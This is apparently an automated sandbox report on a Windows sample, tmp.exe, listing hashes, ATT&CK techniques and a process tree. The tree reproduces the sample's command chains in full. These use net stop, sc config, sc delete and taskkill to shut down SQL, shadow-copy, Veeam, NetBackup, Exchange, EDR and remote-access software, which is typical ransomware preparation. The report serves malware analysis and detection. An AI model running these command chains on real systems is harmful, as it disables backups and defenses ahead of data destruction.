724aa6dae72829e9812b753d188190e16fb64ac6cd39520897d917cfdccc5122

Analysis

max time kernel
34s
max time network
50s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
29/12/2022, 19:30

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

19KB
MD5

6845db47108d6324b9fcad6707cfcff6
SHA1

2dc793dc4e5452cfe91887e9f7f65fb918e7d302
SHA256

724aa6dae72829e9812b753d188190e16fb64ac6cd39520897d917cfdccc5122
SHA512

1afd7b1ca8084e4449c5e9c57574ba37c99b744e8d0725a754dcc52da40392e12875581939d429ec44fed9b2ee31101d00f8ae520c003d1e9c2fa67f018f5d3e
SSDEEP

192:Z84NAAxdT8XvF9XAtntctn9wjStptlqU6tct76t66tsW6tVthttctPt3Zt3tubtt:muAadY/HzJjW

Score

8^/10

evasion

Malware Config

Signatures

Modifies service settings 1 TTPs
Alters the configuration of existing services.
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
872	sc.exe
2324	sc.exe
468	sc.exe
2964	sc.exe
1752	sc.exe
3060	sc.exe
3032	sc.exe
2324	sc.exe
2584	sc.exe
284	sc.exe
2872	sc.exe
2572	sc.exe
2492	sc.exe
3000	sc.exe
1068	sc.exe
1588	sc.exe
2656	sc.exe
2780	sc.exe
2372	sc.exe
2948	sc.exe
1276	sc.exe
2680	sc.exe
2616	sc.exe
2924	sc.exe
2924	sc.exe
2668	sc.exe
2244	sc.exe
1492	sc.exe
2780	sc.exe
3020	sc.exe
2188	sc.exe
2812	sc.exe
2728	sc.exe
668	sc.exe
788	sc.exe
1216	sc.exe
2908	sc.exe
2800	sc.exe
2688	sc.exe
2632	sc.exe
2524	sc.exe
2164	sc.exe
1956	sc.exe
296	sc.exe
3048	sc.exe
1284	sc.exe
2148	sc.exe
3056	sc.exe
2436	sc.exe
2648	sc.exe
2856	sc.exe
2304	sc.exe
2104	sc.exe
2880	sc.exe
2348	sc.exe
1004	sc.exe
1904	sc.exe
2852	sc.exe
3020	sc.exe
768	sc.exe
2328	sc.exe
1208	sc.exe
2488	sc.exe
1796	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Discovers systems in the same network 1 TTPs 2 IoCs

discovery

Remote System Discovery

T1018

pid	Process
2360	net.exe
2512	net.exe

Kills process with taskkill 45 IoCs

evasion

pid	Process
3056	taskkill.exe
2636	taskkill.exe
2920	taskkill.exe
2020	taskkill.exe
2932	taskkill.exe
2400	taskkill.exe
1608	taskkill.exe
3032	taskkill.exe
2736	taskkill.exe
2900	taskkill.exe
1056	taskkill.exe
1632	taskkill.exe
2748	taskkill.exe
1676	taskkill.exe
2652	taskkill.exe
2408	taskkill.exe
2364	taskkill.exe
2888	taskkill.exe
2620	taskkill.exe
2680	taskkill.exe
2388	taskkill.exe
2668	taskkill.exe
1648	taskkill.exe
2404	taskkill.exe
636	taskkill.exe
2760	taskkill.exe
2028	taskkill.exe
1936	taskkill.exe
268	taskkill.exe
2576	taskkill.exe
2504	taskkill.exe
2752	taskkill.exe
2596	taskkill.exe
1640	taskkill.exe
1640	taskkill.exe
2096	taskkill.exe
2648	taskkill.exe
2796	taskkill.exe
2296	taskkill.exe
1728	taskkill.exe
2488	taskkill.exe
1340	taskkill.exe
768	taskkill.exe
2808	taskkill.exe
2732	taskkill.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
468	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1292	tmp.exe
Token: SeDebugPrivilege	468	powershell.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 468	1292	tmp.exe	28
PID 1292 wrote to memory of 468	1292	tmp.exe	28
PID 1292 wrote to memory of 468	1292	tmp.exe	28
PID 1292 wrote to memory of 468	1292	tmp.exe	28
PID 1292 wrote to memory of 1656	1292	tmp.exe	30
PID 1292 wrote to memory of 1656	1292	tmp.exe	30
PID 1292 wrote to memory of 1656	1292	tmp.exe	30
PID 1292 wrote to memory of 1656	1292	tmp.exe	30
PID 1656 wrote to memory of 1380	1656	cmd.exe	32
PID 1656 wrote to memory of 1380	1656	cmd.exe	32
PID 1656 wrote to memory of 1380	1656	cmd.exe	32
PID 1656 wrote to memory of 1380	1656	cmd.exe	32
PID 1656 wrote to memory of 1668	1656	cmd.exe	34
PID 1656 wrote to memory of 1668	1656	cmd.exe	34
PID 1656 wrote to memory of 1668	1656	cmd.exe	34
PID 1656 wrote to memory of 1668	1656	cmd.exe	34
PID 1656 wrote to memory of 1556	1656	cmd.exe	36
PID 1656 wrote to memory of 1556	1656	cmd.exe	36
PID 1656 wrote to memory of 1556	1656	cmd.exe	36
PID 1656 wrote to memory of 1556	1656	cmd.exe	36
PID 1656 wrote to memory of 828	1656	cmd.exe	38
PID 1656 wrote to memory of 828	1656	cmd.exe	38
PID 1656 wrote to memory of 828	1656	cmd.exe	38
PID 1656 wrote to memory of 828	1656	cmd.exe	38
PID 1656 wrote to memory of 1508	1656	cmd.exe	39
PID 1656 wrote to memory of 1508	1656	cmd.exe	39
PID 1656 wrote to memory of 1508	1656	cmd.exe	39
PID 1656 wrote to memory of 1508	1656	cmd.exe	39
PID 1668 wrote to memory of 788	1668	cmd.exe	41
PID 1668 wrote to memory of 788	1668	cmd.exe	41
PID 1668 wrote to memory of 788	1668	cmd.exe	41
PID 1668 wrote to memory of 788	1668	cmd.exe	41
PID 1380 wrote to memory of 2000	1380	cmd.exe	42
PID 1380 wrote to memory of 2000	1380	cmd.exe	42
PID 1380 wrote to memory of 2000	1380	cmd.exe	42
PID 1380 wrote to memory of 2000	1380	cmd.exe	42
PID 1656 wrote to memory of 1980	1656	net.exe	44
PID 1656 wrote to memory of 1980	1656	net.exe	44
PID 1656 wrote to memory of 1980	1656	net.exe	44
PID 1656 wrote to memory of 1980	1656	net.exe	44

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Lscoqaqhparnrkbhgfowpkiller.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLSERVERAGENT"
      4⤵
      PID:2000
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        5⤵
        
        PID:1924
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLTELEMETRY"
      4⤵
      PID:2072
  - - C:\Windows\SysWOW64\net.exe
      net stop "SQLBrowser"
      4⤵
      PID:868
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1668
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQLSERVER start=disabled
      4⤵
      Launches sc.exe
      PID:788
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$
      4⤵
      PID:608
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLBrowser
      4⤵
      PID:2400
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        5⤵
        
        PID:2460
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLWriter
      4⤵
      PID:2980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        5⤵
        
        PID:2216
  - - C:\Windows\SysWOW64\sc.exe
      sc config vss start=disabled
      4⤵
      Launches sc.exe
      PID:2908
  - - C:\Windows\SysWOW64\net.exe
      net stop vss
      4⤵
      PID:2772
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLBrowser start=disabled
      4⤵
      PID:2672
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLWriter start=disabled
      4⤵
      Launches sc.exe
      PID:872
  - - C:\Windows\SysWOW64\net.exe
      net stop vmvss
      4⤵
      PID:2516
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop vmvss
        5⤵
        
        PID:2952
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLSERVERAGENT start=disabled
      4⤵
      PID:2316
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$RE_EXPRESS
      4⤵
      PID:1292
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$RE_EXPRESS
        5⤵
        
        PID:2728
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$FE_EXPRESS start= disabled
      4⤵
      Launches sc.exe
      PID:2324
  - - C:\Windows\SysWOW64\sc.exe
      sc config vmvss start=disabled
      4⤵
      PID:2944
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLANYs_Sage_FAS_Fixed_Assets
      4⤵
      PID:2988
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop SQLANYs_Sage_FAS_Fixed_Assets
        5⤵
        
        PID:2564
  - - C:\Windows\SysWOW64\sc.exe
      sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
      4⤵
      PID:2496
  - - C:\Windows\SysWOW64\net.exe
      net stop MSSQL$VIM_SQLEXP
      4⤵
      PID:1752
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$VIM_SQLEXP
        5⤵
        
        PID:3024
  - - C:\Windows\SysWOW64\net.exe
      net stop SQLSERVERAGENT
      4⤵
      PID:1904
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$VIM_SQLEXP start=disabled
      4⤵
      PID:2776
  - - C:\Windows\SysWOW64\sc.exe
      sc config MSSQL$ start=disabled
      4⤵
      Launches sc.exe
      PID:1276
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher"
      4⤵
      PID:2120
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLFDLauncher"
        5⤵
        
        PID:576
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLSERVER"
      4⤵
      PID:2652
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MSSQLSERVER"
        5⤵
        
        PID:2260
  - - C:\Windows\SysWOW64\sc.exe
      sc config "SQL Server (MSSQLSERVER)" start=disabled
      4⤵
      Launches sc.exe
      PID:1208
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
    3⤵
    PID:1556
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
      4⤵
      Kills process with taskkill
      PID:1676
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.BrokerService.exe
      4⤵
      Kills process with taskkill
      PID:2648
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.CatalogDataService.exe
      4⤵
      Kills process with taskkill
      PID:2900
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.CloudService.exe
      4⤵
      Kills process with taskkill
      PID:2932
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM Veeam.Backup.Manager.exe
      4⤵
      Kills process with taskkill
      PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQLFDLauncher$SHOPCONTROL9"
      4⤵
      PID:948
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSSQL$SHOPCONTROL9"
      4⤵
      PID:1636
  - - C:\Windows\SysWOW64\net.exe
      net stop "MSOLAP$SHOPCONTROL9"
      4⤵
      PID:1224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /IM eSightService.exe /F
        5⤵
        Kills process with taskkill
        
        PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"
    3⤵
    PID:1508
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
      4⤵
      Kills process with taskkill
      PID:2668
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F
      4⤵
      Kills process with taskkill
      PID:636
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Tomcat7w.exe /F
      4⤵
      Kills process with taskkill
      PID:2020
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM Launchpad.exe /F
      4⤵
      Kills process with taskkill
      PID:2808
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mpdwsvc.exe /F
      4⤵
      Kills process with taskkill
      PID:2736
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowEngine"
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8SmartClient.exe /F
      4⤵
      Kills process with taskkill
      PID:2400
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8SmartClientMonitor.exe /F
      4⤵
      Kills process with taskkill
      PID:2404
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM tomcat9.exe /F
      4⤵
      Kills process with taskkill
      PID:1640
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM DDSoftPwsTomcat9.exe /F
      4⤵
      Kills process with taskkill
      PID:1640
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM SqlManagement.exe /F
      4⤵
      Kills process with taskkill
      PID:3032
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT.exe /F & @net stop UFNet & @taskkill /IM MessageNotification.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete cbVSCService11 & @sc delete CobianBackup11"
    3⤵
    PID:1848
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "SQL Server Reporting Services"
      4⤵
      PID:2524
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MSSQLFDLauncher
      4⤵
      PID:2804
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM U8CEServer.exe /F
      4⤵
      Kills process with taskkill
      PID:2920
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ReportingServicesService.exe /F
      4⤵
      Kills process with taskkill
      PID:1340
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM ServerNT.exe /F
      4⤵
      Kills process with taskkill
      PID:2028
  - - C:\Windows\SysWOW64\net.exe
      net stop UFNet
      4⤵
      PID:2664
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop UFNet
        5⤵
        
        PID:2772
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM MessageNotification.exe /F
      4⤵
      Kills process with taskkill
      PID:1608
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM cbVSCService11.exe /F
      4⤵
      Kills process with taskkill
      PID:2388
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @taskkill /IM tv_w32.exe /F & @taskkill /IM tv_x64.exe /F & @taskkill /IM rdm.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM SecureCRTPortable.exe /F & @taskkill /IM VirtualBox.exe /F & @taskkill /IM VBoxSVC.exe /F & @taskkill /IM VirtualBoxVM.exe /F & @taskkill /IM abs_deployer.exe /F & @taskkill /IM edr_monitor.exe /F & @taskkill /IM sfupdatemgr.exe /F & @taskkill /IM ipc_proxy.exe /F & @taskkill /IM edr_agent.exe /F & @taskkill /IM edr_sec_plan.exe /F & @taskkill /IM sfavsvc.exe /F & @taskkill /IM DataShareBox.ShareBoxMonitorService.exe /F & @taskkill /IM DataShareBox.ShareBoxService.exe /F & @taskkill /IM Jointsky.CloudExchangeService.exe /F & @taskkill /IM Jointsky.CloudExchange.NodeService.ein /F & @taskkill /IM perl.exe /F & @taskkill /IM java.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM TsServer.exe /F & @taskkill /IM AppMain.exe /F & @taskkill /IM easservice.exe /F & @taskkill /IM Kingdee6.1.exe /F & @taskkill /IM QyKernel.exe /F & @taskkill /IM QyFragment.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM ComputerZTray.exe /F & @taskkill /IM ComputerZService.exe /F & @taskkill /IM ClearCache.exe /F & @taskkill /IM ProLiantMonitor.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM bugreport.exe /F & @taskkill /IM GNWebServer.exe /F & @taskkill /IM UI0Detect.exe /F & @taskkill /IM GNCore.exe /F & @taskkill /IM gnwayDDNS.exe /F & @taskkill /IM GNWebHelper.exe /F & @taskkill /IM php-cgi.exe /F & @taskkill /IM ESLUSBService.exe /F & @taskkill /IM CQA.exe /F & @taskkill /IM Kekcoek.pif /F & @taskkill /IM Tinuknx.exe /F & @taskkill /IM servers.exe /F & @taskkill /IM ping.exe /F & @taskkill /IM TianHeng.exe /F & @taskkill /IM K3MobileService.exe /F & @taskkill /IM VSSVC.exe /F & @taskkill /IM Xshell.exe /F & @taskkill /IM XshellCore.exe /F & @taskkill /IM FNPLicensingService.exe /F & @taskkill /IM XYNTService.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM EISService.exe /F & @taskkill /IM UFSoft.U8.Framework.EncryptManager.exe /F & @taskkill /IM yonyou.u8.gc.taskmanager.servicebus.exe /F & @taskkill /IM U8KeyManagePool.exe /F & @taskkill /IM U8MPool.exe /F & @taskkill /IM U8SCMPool.exe /F & @taskkill /IM UFIDA.U8.Report.SLReportService.exe /F & @taskkill /IM U8TaskService.exe /F & @taskkill /IM U8TaskWorker.exe /F & @taskkill /IM U8WebPool.exe /F & @taskkill /IM U8AllAuthServer.exe /F & @taskkill /IM UFIDA.U8.UAP.ReportService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.Services.exe /F & @taskkill /IM U8WorkerService.exe /F & @taskkill /IM UFIDA.U8.ECE.UTU.exe /F & @taskkill /IM ShellStub.exe /F & @taskkill /IM U8UpLoadTask.exe /F & @taskkill /IM UfSysHostingService.exe /F & @taskkill /IM UFIDA.UBF.SystemManage.ApplicationService.exe /F & @taskkill /IM UFIDA.U9.CS.Collaboration.MailService.exe /F & @taskkill /IM NotificationService.exe /F & @taskkill /IM UBFdevenv.exe /F & @taskkill /IM UFIDA.U9.SystemManage.SystemManagerClient.exe /F & @taskkill /IM mongod.exe /F & @taskkill /IM SpusCss.exe /F & @taskkill /IM UUDesktop.exe /F & @taskkill /IM KDHRServices.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.Mobile.Servics.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM KDSvrMgrService.exe /F & @taskkill /IM pdfServer.exe /F & @taskkill /IM pdfspeedup.exe /F & @taskkill /IM SufAppServer.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.K3.Mobile.LightPushService.exe /F & @taskkill /IM iMTSSvcMgr.exe /F & @taskkill /IM kdmain.exe /F & @taskkill /IM KDActMGr.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM K3ServiceUpdater.exe /F & @taskkill /IM Aua.exe /F & @taskkill /IM iNethinkSQLBackup.exe /F & @taskkill /IM auaJW.exe /F & @taskkill /IM Scheduler.exe /F & @taskkill /IM bschJW.exe /F & @taskkill /IM SystemTray64.exe /F & @taskkill /IM OfficeDaemon.exe /F & @taskkill /IM OfficeIndex.exe /F & @taskkill /IM OfficeIm.exe /F & @taskkill /IM iNethinkSQLBackupConsole.exe /F & @taskkill /IM OfficeMail.exe /F & @taskkill /IM OfficeTask.exe /F & @taskkill /IM OfficePOP3.exe /F & @taskkill /IM apache.exe /F & @taskkill /IM GnHostService.exe /F /T & @taskkill /IM HwUVPUpgrade.exe /F /T & @taskkill /IM "Kingdee.KIS.UESystemSer.exe" /F /T & @taskkill /IM uvpmonitor.exe /F /T & @taskkill /IM UVPUpgradeService.exe /F /T & @taskkill /IM KDdataUpdate.exe /F /T & @taskkill /IM Portal.exe /F /T & @taskkill /IM U8SMSSrv.exe /F /T & @taskkill /IM "Ufida.T.SM.PublishService.exe" /F /T & @taskkill /IM lta8.exe /F /T & @taskkill /IM UfSvrMgr.exe /F /T & @taskkill /IM AutoUpdateService.exe /F /T & @taskkill /IM MOM.exe /F /T & whoami"
    3⤵
    PID:2236
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM mysqld.exe /F
      4⤵
      Kills process with taskkill
      PID:1728
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer_Service.exe /F
      4⤵
      Kills process with taskkill
      PID:2888
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /IM TeamViewer.exe /F
      4⤵
      Kills process with taskkill
      PID:2732
- - C:\Windows\SysWOW64\cmd.exe
